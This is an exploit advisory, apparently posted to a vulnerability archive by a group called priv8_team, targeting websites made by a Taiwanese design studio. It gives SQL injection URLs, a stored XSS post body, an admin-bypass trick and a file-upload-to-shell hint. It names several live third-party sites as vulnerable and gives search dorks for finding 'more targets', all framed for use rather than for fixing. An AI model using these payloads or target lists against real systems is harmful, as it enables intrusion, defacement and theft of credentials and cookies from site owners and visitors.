Design by 年特資訊 - Multiple Vulnerability

2017.10.06
Credit: priv8_team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

~Exploit Title : Design by 年特資訊 - Multiple Vulnerability ~Exploit Author : priv8_team ~Home Vendor : http://net99.tw ~Date : Friday - 2017 06 October ~Test : Ubuntu 16.04 LTS (Xenial Xerus) - FireFox ~Tnx : Biskoit Pedar & RxR ----------------------------------------- [ Description (Vendor) ] 我們是夫妻起經營的工作室(有營業登記)也有開立發票 統一編號:40898804 本工作室-設計師製作網站以及內部程式已經有將近20年,經驗豐富~案件完成度百分之99 ,一般件、困難件、可完成一般工程師無法完成的案件~ 我們收費合理是很多同業選擇與配合的最佳搭檔~ 我們的專業領域: 網站製作、設計、架構、使用流程規劃,到專業文案撰寫、視覺設計與版型介面設計 [ Vulnerabilities ] 1) Admin Bypass (No Redirect) 2) Remote File Upload 3) SQL injection (Login required) 4) Stored Cross site scripting (Login required) [PoC] Admin Bypass : You can bypass admin page with NoRedirect Plugin of FireFox http://localhost:8080/admin/login.php << Add NoRedirect http://localhost:8080/admin/ or admin.php vuln site : http://www.girls.org.tw/admin/index.php Remote File Upload : http://localhost:8080/admin/upload.php you can upload your files - if you are Clever , so You can Get Shell =) vuln site : http://www.girls.org.tw/admin/upload.php SQL injection : file : edit_portfolio.php - products_index.php - edit_portfolio.php parameter : id Type : Basic Union Based Injection vuln site : http://www.girls.org.tw/admin/edit_portfolio.php?id=-16%27+UNION%20SELECT%201,user(),3,4,5-- - vuln site : http://sh-printing.com.tw/single.php?id=17%27+order+by+4--%20- vuln site : http://www.u-hope.net/products_index.php?id=-14'+UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11--+ vuln site : https://www.omniko-intl.com/products_index.php?id=-47'+UNION SELECT 1,2,user(),4,5,6-- - Stored Cross site scripting : http://localhost:8080/admin/edit_portfolio.php?id=16&action=save file : edit_portfolio.php parameter : id Type : Stored Cross site scripting Post Data : category="><script>alert('Xss')</script>&title="><script>alert('Xss')</script>&img=img/20170126071854.jpg&sor=2&Submit=æ+交 When you replay header with Live Http - xss stored in categories when users or admin visited admin page - you will get Cookies or Browser-Hooking =) vuln site : http://www.girls.org.tw/admin/edit_portfolio.php?id=16&action=save [ Dork ] intext:"Design by 年特資訊" intext:"Design by 年特資訊" inurl:id= you can find more targets =) ------------------------------------------ Special tnx: Mr_Yous3fi , Safengine , RxR And All Memebers of Priv8_Team ./priv8_team #Biskoit_Pedar


Vote for this issue:
28%
72%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top